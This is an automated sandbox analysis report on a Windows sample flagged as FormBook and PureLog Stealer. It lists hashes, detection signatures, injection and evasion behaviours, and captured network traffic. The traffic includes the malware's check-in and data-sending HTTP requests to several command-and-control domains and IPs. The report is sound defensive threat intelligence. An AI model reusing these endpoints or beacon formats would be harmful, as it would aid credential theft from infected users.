Windows Analysis Report
UQO06iOMKZMPZ4A.exe

Overview

General Information

Sample name:	UQO06iOMKZMPZ4A.exe
Analysis ID:	1431983
MD5:	e7c340f6eab299b03ba3ffd6760268f9
SHA1:	66669dc3f7e70675b52b5c6293f4365026da17b9
SHA256:	c6f1edef594e1e06a4d16cc58539d4e50ccc5799a675c42291d81fcc567c9d30
Tags:	exeFormbook
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: UQO06iOMKZMPZ4A.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.linbreoffice.org/qruc/	Avira URL Cloud: Label: malware
Source: http://www.linbreoffice.org/qruc/?vFLHF=St8dDlnHzrct7&xl=Xmo1lInOanbZEZR5AfqbZqRP40VXQk0TYIBV9i+RFmbCb5D19+w35N1Is2bkZ42QIXmVJTObgj0BeJUqj9w3SBcjawfNBsE/jQutHm2oP9EVAL/0u02x0DQ=	Avira URL Cloud: Label: malware
Source: http://www.klingerlumberltd.com/qruc/?vFLHF=St8dDlnHzrct7&xl=4y8JdVmVqWeea5bbMhnz8aXW/zBNuVIx9gyDCHl5L7QB29ig52mkDYCfyusGnjDf+1nAg1jN2XuDrRbFj9LrVx3K8AcskdL8Q9MgXuVmjPqiRPQTvnH80A0=	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.linbreoffice.org	Virustotal: Detection: 7%	Perma Link
Source: klingerlumberltd.com	Virustotal: Detection: 11%	Perma Link
Source: http://www.linbreoffice.org/qruc/	Virustotal: Detection: 8%	Perma Link

Multi AV Scanner detection for submitted file

Source: UQO06iOMKZMPZ4A.exe	ReversingLabs: Detection: 62%
Source: UQO06iOMKZMPZ4A.exe	Virustotal: Detection: 52%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.UQO06iOMKZMPZ4A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.UQO06iOMKZMPZ4A.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2873773132.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2062443997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2871535799.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2873698812.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2064726692.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2874222772.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2065008686.0000000003330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: UQO06iOMKZMPZ4A.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe

Unpacked PE file: 0.2.UQO06iOMKZMPZ4A.exe.130000.0.unpack

Uses 32bit PE files

Source: UQO06iOMKZMPZ4A.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: UQO06iOMKZMPZ4A.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Data.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.Xml.ni.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: Accessibility.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.Windows.Forms.pdb@\^q source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: wntdll.pdbUGP source: UQO06iOMKZMPZ4A.exe, 00000002.00000002.2063166629.00000000019F0000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 0000000B.00000002.2874034277.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 0000000B.00000002.2874034277.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 0000000B.00000003.2064791779.0000000003803000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 0000000B.00000003.2062776403.000000000365C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: UQO06iOMKZMPZ4A.exe, UQO06iOMKZMPZ4A.exe, 00000002.00000002.2063166629.00000000019F0000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, unlodctr.exe, 0000000B.00000002.2874034277.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 0000000B.00000002.2874034277.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 0000000B.00000003.2064791779.0000000003803000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 0000000B.00000003.2062776403.000000000365C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.Configuration.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.Data.ni.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.Xml.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: unlodctr.pdbGCTL source: UQO06iOMKZMPZ4A.exe, 00000002.00000002.2062926524.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000A.00000002.2872436865.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000A.00000000.1986026100.0000000000F3E000.00000002.00000001.01000000.0000000D.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000C.00000000.2132171206.0000000000F3E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: System.Drawing.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.Data.ni.pdbRSDS source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.pdb4 source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: Accessibility.pdb< source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.Core.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: unlodctr.pdb source: UQO06iOMKZMPZ4A.exe, 00000002.00000002.2062926524.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, DpzZIqplfZXGlyHqisknlKbWCP.exe, 0000000A.00000002.2872436865.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.Data.pdb, source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER4FB8.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER4FB8.tmp.dmp.5.dr

Source: C:\Windows\SysWOW64\unlodctr.exe

Code function: 11_2_02F9B7C0 FindFirstFileW,FindNextFileW,FindClose,

11_2_02F9B7C0

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_0964E770
Source: C:\Users\user\Desktop\UQO06iOMKZMPZ4A.exe	Code function: 4x nop then xor edx, edx	0_2_0964EB38
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4x nop then xor eax, eax	11_2_02F89470

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.4:49751 -> 109.123.121.243:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.quantumboulevard.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 64.225.91.73 64.225.91.73
Source: Joe Sandbox View	IP Address: 66.29.135.159 66.29.135.159

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
Source: Joe Sandbox View	ASN Name: UK2NET-ASGB UK2NET-ASGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /qruc/?vFLHF=St8dDlnHzrct7&xl=4y8JdVmVqWeea5bbMhnz8aXW/zBNuVIx9gyDCHl5L7QB29ig52mkDYCfyusGnjDf+1nAg1jN2XuDrRbFj9LrVx3K8AcskdL8Q9MgXuVmjPqiRPQTvnH80A0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usHost: www.klingerlumberltd.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /qruc/?xl=UAq9CzGRql0qbxLJ0VHAxYbE6gcH95yIoC7W/FPBEpHWNGr0R1xACLnBcwEc3ZkTuU45ULwzGu2M7+E0XrmRKTDELq+4Gy/k2I5T6z62BN58jG7ys8mA5gg=&vFLHF=St8dDlnHzrct7 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usHost: www.gattosat.icuConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /qruc/?vFLHF=St8dDlnHzrct7&xl=Xmo1lInOanbZEZR5AfqbZqRP40VXQk0TYIBV9i+RFmbCb5D19+w35N1Is2bkZ42QIXmVJTObgj0BeJUqj9w3SBcjawfNBsE/jQutHm2oP9EVAL/0u02x0DQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usHost: www.linbreoffice.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /qruc/?xl=TKQjCngekOUXb4wYgtIljeQn8ysV0DQxkVDYFHPguHHgtawi326eHXwL5/LbdhSUHl1rH91YHPKtuSAwSH4DrTeIYMFIFWvJ0j7VceHyTVuRqxxukq8+akA=&vFLHF=St8dDlnHzrct7 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usHost: www.quantumboulevard.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /qruc/?vFLHF=St8dDlnHzrct7&xl=ebTrY2reCe2ZTSPQmCOT7uftBIKel9RxJULKIziXTH46LqUEJduuafb87psJAf6uxD5XXi6v1WxfauXtOkGyHWMQjIrD11Zkal8n9/6ZGFCOuXv54YqdQOw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usHost: www.dntchunkysalsa.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Source: global traffic	DNS traffic detected: DNS query: www.klingerlumberltd.com
Source: global traffic	DNS traffic detected: DNS query: www.gattosat.icu
Source: global traffic	DNS traffic detected: DNS query: www.linbreoffice.org
Source: global traffic	DNS traffic detected: DNS query: www.quantumboulevard.xyz
Source: global traffic	DNS traffic detected: DNS query: www.dntchunkysalsa.com
Source: global traffic	DNS traffic detected: DNS query: www.electronicraw.com

Source: unknown

HTTP traffic detected: POST /qruc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.gattosat.icuConnection: closeContent-Length: 199Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Origin: http://www.gattosat.icuReferer: http://www.gattosat.icu/qruc/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoData Raw: 78 6c 3d 5a 43 43 64 42 45 2b 78 67 31 42 4f 46 52 2f 4b 79 48 37 32 79 4c 48 53 34 79 30 77 70 6f 32 73 6c 44 6a 46 32 68 61 61 4c 74 62 6e 4a 31 4b 67 54 77 39 6e 47 4f 4b 5a 63 53 45 4d 6d 49 4a 49 6e 47 55 49 4b 34 74 55 63 34 4f 64 36 50 4a 74 5a 65 48 6a 41 79 33 78 42 65 6d 39 50 33 44 59 67 5a 74 6c 36 43 33 43 46 38 31 6d 6f 58 7a 4a 6b 72 66 7a 38 79 68 4a 70 49 30 36 57 37 6e 74 67 76 68 44 77 4e 2f 72 37 41 2f 76 43 41 50 6f 69 76 30 78 55 56 6b 68 2f 35 42 32 6e 6f 77 5a 6e 45 4b 67 49 37 76 61 79 33 63 34 6d 55 36 78 78 6c 47 70 4f 5a 68 73 6a 37 73 6f 38 54 4a 42 74 41 3d 3d Data Ascii: xl=ZCCdBE+xg1BOFR/KyH72yLHS4y0wpo2slDjF2haaLtbnJ1KgTw9nGOKZcSEMmIJInGUIK4tUc4Od6PJtZeHjAy3xBem9P3DYgZtl6C3CF81moXzJkrfz8yhJpI06W7ntgvhDwN/r7A/vCAPoiv0xUVkh/5B2nowZnEKgI7vay3c4mU6xxlGpOZhsj7so8TJBtA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 26 Apr 2024 05:39:49 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 05:40:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 05:40:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 05:40:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 05:40:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:40:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:40:36 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not 